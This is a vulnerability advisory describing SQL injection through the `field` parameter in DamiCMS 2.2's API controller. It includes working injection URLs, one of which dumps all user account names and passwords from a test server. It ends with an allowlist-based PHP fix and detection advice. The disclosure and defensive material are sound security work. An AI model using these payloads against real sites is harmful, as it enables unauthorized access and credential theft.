DamiCMS 2.2 /Web/Lib/Action/ApiAction.class.php SQL Injection Vulnerability

2015-04-01T00:00:00
ID SSV:89090
Type seebug
Reporter Root
Modified 2015-04-01T00:00:00

Description

Affected file: /Web/Lib/Action/ApiAction.class.php

```php
$field = !empty($_REQUEST['field']) ? inject_check($_REQUEST['field']) : '';

$m = new Model($model, "", false);

// If paging is used, the cache does not take effect either
if ($page) {
    import("@.ORG.Page");     // change this to your own Page class

    $count = $m->where($where)->count();
    $total_page = ceil($count / $pagesize);
    $p = new Page($count, $pagesize);

    // If paging is used, num has no effect
    $t = $m->field($field)->where($where)->limit($p->firstRow . ',' . $p->listRows)->order($order)->select();

    //echo $m->getLastSql();

    $ret = array('total_page' => $total_page, 'data' => $t);
}
```

Because the injection point is in `field`, the keyword filtering applied to the query can be bypassed, resulting in SQL injection. When the following is passed:

```
s=/api/ajax_arclist/model/article/field/database()%23
```

the SQL statement executed is:

```sql
SELECT database()# FROM dami_article
```

The page returns:

Screenshot: https://images.seebug.org/@/uploads/1434694877018-87035C9E-A360-4281-84EA-98941C54B6AE.png

This confirms that the vulnerability exists.

Visiting the address:

```
http://10.211.55.12/damicms/index.php?s=/api/ajax_arclist/model/article/field/username,userpwd%20from%20dami_member%23
```

yields the account names and passwords of all users:

Screenshot: https://images.seebug.org/@/uploads/1434694899736-59028A1D-7EBE-46E7-AA40-66696D0046D6.png
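The root cause above is that `inject_check()` only looks for keywords, while `field` is spliced straight into the SELECT list. The fix that actually closes this is an allowlist of column identifiers. The following is an added example, not DamiCMS's code; the `safe_field_list()` function, the `$ARTICLE_FIELDS` column list and the test inputs (the advisory's two payloads, URL-decoded) are all assumptions constructed for illustration.

```php
<?php
// Added example (not DamiCMS code): replace keyword filtering of the
// `field` parameter with a strict allowlist of column names.

/**
 * Return a safe, comma-separated column list or throw.
 * Every item must be a bare identifier AND appear in $allowed, so
 * expressions such as database() or "x from t#" never reach the query.
 */
function safe_field_list(string $field, array $allowed): string
{
    $field = trim($field);
    if ($field === '') {
        return '';                      // same default as the original code
    }
    $cols = array_map('trim', explode(',', $field));
    foreach ($cols as $col) {
        // identifier only: letters, digits, underscore; no spaces, parens, comments
        if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]{0,63}$/', $col)) {
            throw new InvalidArgumentException("Illegal field syntax: $col");
        }
        if (!in_array($col, $allowed, true)) {
            throw new InvalidArgumentException("Unknown field: $col");
        }
    }
    return implode(',', $cols);
}

// Assumed column allowlist for the article model (hypothetical schema).
$ARTICLE_FIELDS = ['id', 'title', 'litpic', 'pubdate', 'click'];

// Constructed inputs: one legitimate request, then the advisory's payloads.
$tests = [
    'id,title'                           => true,
    'database()#'                        => false,
    'username,userpwd from dami_member#' => false,
];
foreach ($tests as $input => $shouldPass) {
    try {
        $out = safe_field_list($input, $ARTICLE_FIELDS);
        echo ($shouldPass ? 'OK  ' : 'FAIL') . " accepted: $out\n";
    } catch (InvalidArgumentException $e) {
        echo ($shouldPass ? 'FAIL' : 'OK  ') . ' rejected: ' . $e->getMessage() . "\n";
    }
}
// In the controller the original line would then become:
//   $field = safe_field_list($_REQUEST['field'] ?? '', $ARTICLE_FIELDS);
```

Rejected requests should also be logged with the offending value, since a `field` containing `(`, a space or `#` is a reliable detection signal for attempts against this endpoint.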